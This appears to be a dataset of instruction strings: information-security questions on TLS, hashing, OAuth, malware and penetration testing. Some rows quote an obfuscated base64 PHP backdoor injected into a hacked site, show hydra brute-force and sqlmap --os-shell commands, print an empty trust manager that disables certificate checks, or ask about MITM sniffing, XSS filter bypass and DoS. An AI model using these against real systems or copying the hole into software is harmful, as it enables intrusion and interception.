instruction stringlengths 24 29.9k |
|---|
Is there any attack out there that can be implemented where a single request to a server i host for example responds by sending the same file say 20 times back ? the idea behind the attack is to DOS tor nodes which are hosting the stream, this attack is for a masters project, and just want to prove the concept of it wo... |
I need to send a lot of small messages that are usually between 128 bits and 256 bits long, and each message is encrypted with a separate 128 bit AES key. Therefore, to send each message with the key would require between 256 and 384 bits of data. If a message is 129 bits long, it would still take 2 AES blocks to enc... |
I'm using Ettercap as MITM for testing on sniffing password but I'm not getting some POST request data containing "usuario" (user in spanish) and "clave" (password in spanish).
I'd like to know if there's some editing file in order to add those fields into the sniffing engine.
|
I want to test an ldap directory with ldapsearch. No passwords are stored in the LDAP directory. Account passwords are stored in Kerberos and LDAP contains a pointer to the Kerberos principal. The ldap has an attribute userPassword
Attribute Name: 'userPassword'
OID: 2.5.4.35
URN: urn:oid:2.5.4.35
Multiple Values... |
While using google chrome I keep getting a pop-up from Sophos saying "High Risk Website Blocked - Access has been blocked to "codegv.ru"
It happens every time I perform any action in google chrome. Any navigation and it comes up.
I suspect there to be Malware on my computer. I am currently letting Sophos scan my compu... |
I am downloading Ubuntu Linux, and would like to make sure that my download has not been tampered with.
Ubuntu has a GPG key, which I could use to make sure that the download is valid -- but how do I validate the key? Unfortunately, the key seems to only be available via hkp -- which is not a secure protocol!
The GPG k... |
What are the tools Google uses to blacklist a website as being malicious (hosting a web malware)?
I know it is partly fed by users themselves who can enter unsafe URLs into Google's database.
But what, apart from this, are the tools Google uses? Does it rely on anti-viruses, for example?
Also, why is the Google safe... |
I have a SSL site where a user can select items to purchase, register and pay. For payment, the user is redirected to a payment gateway. Once the payment is completed, the user is redirected to our website.
Now, my client wants to host one form on his non-https site in a secure iframe to get some information(non-sensi... |
All OTP systems that I have observed, send a new OTP every time a user requests for an OTP. (for example whatsapp)
Only the latest OTP is valid and an OTP can only be used for X hours.
I am wondering what would be the drawback if I send the same OTP for every user request in the said X hours?
So let us say X = 2, then ... |
Recently I saw a domain of mine was hacked and the hacker have injected his code in some encryption format as below.
<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'D+I/q0Gc5hiUdrnOss2HvSvTg1sG8Q6rE6jWEaBtDzQFKd1Er6yZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b... |
Let's say I have an iOS/Android app which rely on a custom REST API for things such as account management (register, login, password reset, get/set user-related data).
There is no good way to guarantee my API is only called from my mobile application. Oauth2 and the like with 'secret' in the client code can be easily r... |
Mesh network have one router connected to WAN or Internet so IP address is allocated to that router will be exiting point for all the nodes.. and other routers will have Internet connection from that Router..
so when any malicious activity is done by someone at the time they are connected routers within Mesh WiFi netwo... |
No matter on which server I try to connect via password login, I always get the error message
Too many authentication failures for
If I have exchanged the ssh-keys, I can login without password as before, also if I rename my user ~/.ssh folder, I get to the password prompt as suspected.
What can I have wrong in my .s... |
Say I have a page on my website which lists public keys to be used in case people would either allow me access to a server, or send me encrypted information.
Is there any benefit to me providing different types of keys for users to use, or multiple keys of the same type but different sizes?
For example, a page on my we... |
I am using Ubuntu and am wondering if installing Snort on my host can make me more vulnerable?
|
Suppose that instead of using, say, Google, let me in! as my Google password, I used some consistent transform of this string, say ZWE1NjMyNm?
What search keywords would be helpful to search for information on the general idea of using "pre-password transforms" as passwords?
|
https://www.openssl.org/docs/apps/ciphers.html listed a set of cipher suites supported by different protocol versions, but I don't see a TLS 1.1 list.
Anybody could help me to understand where to get a lit of cipersuites supported by OpenSSL TLS 1.1?
|
I recently learned about how WPA-PSK works. If I understand correctly, the 4-way handshake enables the protocol to ensure mutual possession of the PMK (and therefor, the PSK) without sending the PMK/PSK over. This way it's not susceptible to a man-in-the-middle attack.
My question is, how is mutual authentication ensur... |
Is it possible (and how) to tell from a network dump if there is a buffer overflow attack, DoS or brute force attack? A DDoS would be more obvious to identify, but those attacks mentioned above I think would look a little more like normal activity.
Sorry for my newbie question, your answer would help a lot. Any informa... |
Currently we authenticate WCF calls TO a service via ADFS, using the following procedure:
Firstly, we get a SAML token from ADFS
using (var factory = new WSTrustChannelFactory(
new UserNameWSTrustBinding(System.ServiceModel.SecurityMode.TransportWithMessageCredential),
new System.ServiceModel.EndpointAddress(new ... |
So I have a site where users can create online surveys and send them out to whomever they like. Over the past few months we have seen an uptick in one particular user who creates an account, then creates a survey where he requests user names and passwords for a different site. It's always the same site that he target... |
Fed up with the following definition.
Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims ... |
I am very new to cryptography and I am confused with something. Here is the homework question I am having trouble with:
Write a program to attack the Textbook RSA Encryption Scheme, in order to decrypt the encrypted file key_enc.txt which contains the 128 bits AES secret key together with the initialisation vector (I... |
So I've made a tool for web developers and now I want to sell it, but I don't want all web developers to see my code (PHP).
I do know there are PHP Obfuscators, but I don't want to use them, as they are not COMPLETELY 100% secure. I tried looking for a compiler for PHP (I know they aren't 100% secure as well, but they ... |
I have some job related files I have already compressed with 7Z.
I have protected each with good 10 character passwords consisting of upper, and lower cases, numbers and special characters.
And I have enabled header encryption of the filenames.
I am not yet concerned about the physical security of my system or side ch... |
Can we trace the imei numbers of mobile devices in which SIM card was used previously, & if it was used in multiple mobile devices?
|
My organization is preparing to purchase some 50 "units" from Symantec, with which we can purchase Verisign SSL certificates of varying authentication levels. Our organization does not have--but definitely would like--the ability to send digitally signed e-mail to external business partners and clients, and use the s... |
Like damaging a chip on the motherboard, increase the fan's speed till something explodes, or anything similar to that. I am not an IT guru, but I never came across a malicious code that couldn't be erased using a certain software, nor a virus that caused something beyond corrupting the OS.
|
We are in the process of upgrading our webservers to support TLS 1.2 but I have heard rumor of very old browsers, such as those used as kiosks will fall over when trying to connect to a server that has TLS 1.2 support. Is this true? Or will every browser no matter how old and outdated just fallback to their supported T... |
I wonder if some processes may get less packets than others if they are all listening to the same wireless interface.
I'm running for example the basic mitm schema using arpspoof, sniffing packets with ettercap, running urlsnarf to see some GET requests and tcpdump saving the dump packets into a file. All in different ... |
Having /var/www/site.com owned by www-data:www-data with a 750 permission for directories and 640 for files, and having my user alexb added to www-data group, I found my self with permission issues when I try to pull new releases (git pull) to the testing environment.
So, right now, the only solutions that come into my... |
According to http://en.wikipedia.org/wiki/Transport_Layer_Security#Web_browsers most browsers support SSL 3.0. And with my understanding (please correct me if I am wrong), when a browser just establishes a connection with a HTTPS server, the browser sends a list of ciphers to the server in a preferred order, servers re... |
I frequently have to remind my members not to post their e-mails due to spam bots. One of them told me he doesn't care about that since his spam filter is good enough. If I allow him to do that, are there disadvantages to my website?
|
Where do 4096 bit RSA keys for SSL certs currently stand in terms of things like CA support, browser support, etc? In the overall scheme of things is the increased security worth the risk of 4096 bit keys not having the widespread support and compatibility as 2048 bit keys do, not to mention the increased CPU load requ... |
I have passwords stored in my database that are very long, unique and generated by a CSPRNG.
Do I need to use a salt before hashing them?
My understanding is that usually you use a hash function in the following way:
hash(salt + password)
where the + is simply the concatenation of the 2 strings (or byte arrays). Since... |
I'm trying to save only POST packets using tcpdump filter expressions. I started with 'tcp port 80' and I found on the web a specific expression to achieve that.
tcpdump -i wlan0 -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'
Where 0x504f5354 means POST.
That works, but when only saving packets instead o... |
Some apps like Foursquare require the user to "check in" at physical places, in order to gain money benefits.
Given that emulated GPS are available for customized versions of Android, it sounds easy to trick such apps.
Given the monetary incentives, I am sure many people have tried, so how do apps prevent GPS cheatin... |
I connect to the internet using my company's Wi-Fi and Tor. Can they still see the websites I visit?
|
I am looking for JavaScript malware. I need it just for local tests on my computer for a project I am working on. Are there any Internet resources where I could find this?
|
I am new to pen-testing. Yesterday i analysed one android application using dex2jar application and i saw an android application implemented https connection using empty trust manager.
class miTM implements javax.net.ssl.X509TrustManager{
public void checkServerTrusted(java.security.cert.X509Certificate[] certs, ... |
I have a mobile banking application installed on my phone which allows me to pay for things, transfer money using my phone from my account to another etc.
How safe or unsafe is this application? For example, what are the chances that I could get malware/virus/spyware/keylogger on my phone which could somehow record my... |
I installed a Windows XP virtual machine on VirtualBox. The host machine is also a Windows XP. I run 5 viruses on the guest machine, however this does not seem to infect my host machine. Could someone inform me why ?
|
In the past I have seen having a Google drive document and have FTP username/passwords there.
Is storing passwords in Google drive a good practice?
|
I have some weird traffic heading outbound from my network. It is being blocked by the firewall from exiting and I'm not sure what the source is. I've looked at the machine and don't see anything blatant compromise-wise.
What I've done on the machine: The box is Win7 Enterprise x64. I used Redline to capture a memory i... |
We all know a password should contain a healthy mixture of letters (upper and lower), numbers, and special characters.
But does the randomness of their placement matter. Of course for letters it matters whether or not it spells a dictionary word, but lets say you have random letters, numbers, and characters.
So a simp... |
(Before everything excuse me because of my English) Today one of my friends asked me about his Nokia 130 Dual SIM. There was a problem about Short Message System. No Messages were sent from that phone. First I thought there is a problem with Message Center configuration. So, I checked it out. There was't any problem wi... |
We are currently working on authentication for a web application. For password storage, we're using Jasypt StrongPasswordEncryptor with SHA-256 and tens of thousands of iterations. Going into the project, I had hoped to implement PBKDF2-HMAC-SHA512 (I do not believe I could get traction on a switch to bcrypt or scrypt)... |
I installed OpenSSL locally and used s_server command to start a server by using self signed certificate created by OpenSSL as well.
The command I used to start a https server is OpenSSL> s_server -accept 443 -www -cert c:\temp\test_server.crt -key c:\temp\test_server.key. I pointed my own browser to it and I can see a... |
My question is based on this tweet after I commented about forbidding + symbols in email addresses. The tweet says, "This is a measure we've taken for security reasons."
This can be frustrating and inconvenient for people that have (or use) plus signs in their email address, and I'm sure web sites don't intend to do th... |
The default method for updating flash is through Adobe's unsecured http portal, which seems to be a serious security concern, given the access that flash has on a user's machine. Can anyone recommend a secure way to update flash?
|
I don't trust Dropbox to keep my files secure. In fact, the same goes for all the other file clouds. What I'd like is a easy and cross platform means of encrypting files that I add and read from Dropbox. I'd love to be able to use Dropbox as if I'm mounting an encrypted partition. In other words, so I don't need to... |
This Shamir Secret sharing utility consumes the secret key, and then generates N keys that must be manually distributed to each person.
This is probably fine for most low-security situations, but not suitable in medium or high security scenarios where no-one can know all the keys, or the secret key that was created in ... |
Do these 2 terminologies refer to the same thing?
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
http://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis#.NET
Some of the tools overlap. Makes you wonder. If they are different can someone explain to me the differences.
|
Lately, I was reading that article about SSL client certificate.
Why is nobody using SSL Client Certificate?
The answer was to that question was :
In the current state, this excellent idea is rendered completely
useless by the awful usability and the completely detached nature:
This is a browser feature. It's brow... |
If you get a disposable email from say guerrillamail.com, and then fill out the forgot my password page at dahorta.org/app/index.php/cliente/resgatar_senha, it emails you a link to reset your password. The url has a 40 character number which I think is a SHA-1 hash.
I noticed that when you fill out the same email twice... |
Can a CSR be created in OpenSSL with SHA2? If so, what would the command be and what does this tell the CA, if anything? If you could create a CSR using SHA2 would it "tell" the signing CA to use it on the entire cert chain?
|
What are the use cases for defining something other than the default SHA1 hash in a CSR? Is it to protect the digital signature, public/private keys? What is it protecting exactly?
|
There are serious tools and services such as Google Safe Browsing for malicious and phishing websites, and others fully dedicated to phishing websites such as Phishing.org.
What is done against these websites (especially the ones that distribute malware, with drive-by download attack, for instance) once they are public... |
I'm just wondering. How does iOS prevent someone from executing code on their device that isn't from Apple or downloaded from the App Store?
Also what exactly, does a Jailbreak do to allow unauthorised code to be run on an iOS device?
Also are the steps to Jailbreak a device repeatable when a new version of iOS is rele... |
I've always contacted my bank and credit card provider every year and simply asked to change my credit card number itself (and get a new card). They do so without a hassle and I feel more secure in doing it.
Does this actually provide better security? My thought process is that if a hacker steals or otherwise finds on... |
in RFC 6749 The OAuth 2.0 Authorization Framework
2.3.1. Client Password definitely states that authentication at TokenEndpoint can be done in two alternate ways
HTTP basic authentication - client_id:client_secret
in the POST request-body, client_id={client_id}, client_secret={client_secret}
While Facebook API deman... |
There are a lot of free antivirus software and free versions of commercial anti-malwares. Can we really trust these free antivirus programs?
The same question about commercial antivirus software. Maybe they install backdoors on our computers?
|
What would be reason for placing a proxy server in a Demilitarized Zone (DMZ)?
I understand that a DMZ is a separate network to your internal network (lies inbetween internal network and firewall). I know that you would add a computer which hosts services to the DMZ e.g. web server, to increase security (if your web se... |
I've seen plenty of websites that, during the signup process, require me to verify my email address or cell phone number by clicking an emailed link or by entering some one-time-use code that's been sent to me.
I generally find these systems a pain to use. For the email it's annoying to have a separate tab open up whe... |
So when I do hydra -l Admin -P "rockyou.txt" -s 80 192.168.13.1 http-get / it doesn't work for me. It says all 16 passwords are valid, but none of them works. Can anyone help me with this? I tried googling and found others having this issue, but none of them were descriptive enough for me to resolve this. I'm using a D... |
Symbols like >, <, / etc are getting escaped any alternative to carry out the xss attack ?
most of the websites are having xss filters
|
So I was analysing a new application that is being written. I noticed that on the app server level there are sql calls that are being made from C# code. These calls can be seen in wireshark by following the TCP stream from my machine.
Is there any way to prevent a MITM from seeing this? The calls look something like t... |
After watching Black Hat's presentation on the fundamental problems with USB "security", I'm wondering if there's a way to do USB whitelisting in Linux.
Is there currently a mechanism that will allow only a certain list of USB devices to actually load drivers and run on latest Linux kernels?
|
I may have been under the wrong impression on how servers should be setup and what certificates actually get sent over during the server hello certificate message. I came across this today from Symantec/VeriSign:
Root installed on the server. For best practices, remove the self-signed root from the server. The certifi... |
We're looking at hosting some of a client's existing applications in our environment.
My current thinking is we will have an encrypted channel back to the client's network over which authentication and authorisation (as well as user traffic) will travel.
This seems preferable to implementing my own IdM and then having ... |
We're looking to host a number of client applications in our environment.
Some of those will use crypto, e.g. for ssl or database encryption and obviously we'll need to manage keys for that.
I am not sure whether I should ask the client for keys, which we will then hold on their behalf; with all the problems of co-ordi... |
Context: I have a directory full of sensitive company files. I want to compare these files with a colleague at a remote location, without the need for a secure connection.
Is it safe for me to publicly publish a list of the SHA-1 hashes of these files?
I understand that it's impossible to reverse the hashing algorithm,... |
We currently run a Cisco ASA 5510 and a RSA token to authenticate users to our network for VPN access. The company is trying to start BYOD but would like to make sure that the PC has been approved by corporate before hitting our network. This is not something that is currently in place as anyone with an RSA token and U... |
I have an intermediate and a root PKI certificate that I see were already imported into a computers (windows server 2003) certificate store. However both the intermediate and root certificates were placed in the 'Trusted Root Certification Authorities' certificates folder.
That is obviously the appropriate place for t... |
I came to know recently that HSMs are used in credit card processing on the server side but since I don't work in that space and stumped as to why its needed.
I can see it used in an ATM machine - to encrypt data to be sent to the server for verification.
But once its already inside the firewall would I not just quer... |
I'm fooling around with Wireshark to capture the activation packets for an iPhone and some other stuff, however the traffic is encrypted. There should be a private SSL key somewhere on my computer to decrypt this traffic, but I've spent hours trying to find it with no luck. I'm on OSX Mavericks, latest iTunes build. I'... |
We run Exchange 2010. Our edge servers run "passive opportunistic TLS" for 99% of the domains we communicate with. For a handful of domains, we have forced TLS on both our end and the other domain's end.
We're in the process of deploying a secure email gateway appliance. It will basically park your email message on ... |
I can't get to upload the stager file on the OWASP BWA document root
(/var/wwww/WackoPicko/users). I am not sure how to troubleshoot this error.
root kali:~# sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php"
--data "username=hacker&password=password&submit=login" --os-shell -v 1
--flush-session
sqlmap/1.0-de... |
I read about Chrome OS in the security section, and I was wondering what the meaning of "sandboxing" that they keep mentioning is. Is this sandboxing like Selinux or Apparmor ?
|
I have a Winforms app that users have to download and install on their machines. It connects to a WCF service(using SSL), hence requires the server certificate to be installed on users' Trusted Certification Authorities. Can anyone suggest the best practice for distributing a server certificate to allow users to downlo... |
I can see clearly how discretionary access control (DAC) works by checking the properties of a file on my MSWindows machine, the file has attributes and the owner of the file can do almost anything with it like making it available for everyone to read, transfer the ownership to an other user or even delete it
However I... |
As an 'extension' to earlier questions on this topic (for instance here and here),
What makes Firefox extensions (appear) more secure than Chrome extensions?
Do they just appear to be more secure, or are they really?
See also:
Why do Chrome extensions need access to 'all my data' and 'browsing activity'?
Worst case... |
Is it technically or theoretically possible for any part of a mobile phone's circuitry to be still on and transmitting even while turned off and the battery has been removed? If so, how?
I am thinking perhaps it could remain in a low power state and certain chips and capacitors could hold their charge for a while. Is t... |
I am currently beginning to studying the different security protocols and came across the SRP secure remote password protocol. I manage to understand the mathematic formulas behind it and the calculation but i do not understand the reason/purpose of using the "g" -> a generator of the multiplicative group.
Why is "g" a... |
Today malware is mainly spread thanks to vulnerabilities exploited in browsers and their plugins. The attackers use JavaScript to target those vulnerabilities. Two examples of such attacks are drive-by download and buffer and stack overflow attacks. What is the difference between these 2 attacks ? They seem to be simil... |
The only thing I know is that virus can get into the other programs and infect it whereas worms cannot attach itself to another program.
|
I have an application running on a server, that has an exposed socket to the Internet to communicate with client that is/are application(s) on a phone. How would one go about properly securing the access to the server, if one is not sure he could trust the client to store secrets?
What I mean by not trusting, is that ... |
Suppose I save content into the database after sanitizing it. Is there still a need to sanitize it again when retrieving it? If yes, why?
|
Recently, we've been asked by Audit Dpt. to have financial risks controls in our ERP (fraud-like incidents).
Our question is if this request is covered by the scope of Information Security Dept?
If so, I think a set of tests should be developed with IT and Finance Dpt.
So, What are the competencies of a Information Sec... |
If a company sends me a new password via SMS/email because I clicked "forgot my password." Does that mean the company is not actually hashing my passwords?
|
Two years ago a professional gang broke into the Bureau de Change next door during the night. One of the cameras was a small IP camera which I had advised them to install as I thought an off-site recording would be a good thing. However, they were so professional that they recognized the IP camera and covered their fac... |
Windows 8 requires Fiddler to set up an exemption when sending traffic to localhost.
Since this is a default setting (and affects many computers):
What security benefit does this provide
How can I list any exceptions that may be placed on my machine? (By Fiddler or any other similar software)
|
I am using OpenPGP and sending a signed, encrypted file with forced MDC (Modification Detection Code) over the network.
In typical file transfer scenarios where security is not in picture, an md5 checksum of file being transferred is sometimes sent along with the original file which can be useful for error detection by... |
I'm moderating a closed section of a forum - think 'covered by NDA' (not actually, but it's a good equivalent of the situation), with restricted access.
Sometimes we find screenshots from that forum posted by some rogue user anonymously in places where they definitely shouldn't appear. And the screenshots being anonymo... |
I'm building a small site which I would like to integrate with LinkedIn for authentication. LinkedIn says that redirect_uri's can be either http:// or https:// (not having to pay for a certificate is really awesome right now)
Upon reviewing the OAuth2 spec, I can't wrap my head around the possibility of exchanging a to... |
I use public proxies a lot. I was wondering, is it possible that they can modify the html and send back malicious javascript, etc?
|
It's not that difficult to reset the password of the administrator account in MSWindows when you have local physical access to the machine
Same thing applies on any Linux distro, it's possible to reset the root account password
This means without encryption you have no security what soever on your PCs unless you make s... |
We know that viruses and other threats can propagate through mail etc.But when any resource is shared,it is uploaded to the server and then shared.This means that the server does not take the responsibility of cleaning the uploaded files of viruses.Then how does it ensure self defense and secure the resources present o... |
Hello I want to know why this kind of example question never been asked before.
I got this code from my college that they say this kind of code is able to prevent SQL injection.
We use CodeIgniter to build a website and here is the code to prevent SQL injection.
Controller:
$usr = $this->input->post('userid');
$pwd = $... |
I wonder if the normal webmaster can get some information about SQL injection into their sites. I guess that it is written in some log, and only if you happen to see the logs you'll see that activity, am I wrong?
Should the attacker be using some TOR proxy in order to be hidden when performing some tests, or it isn't a... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.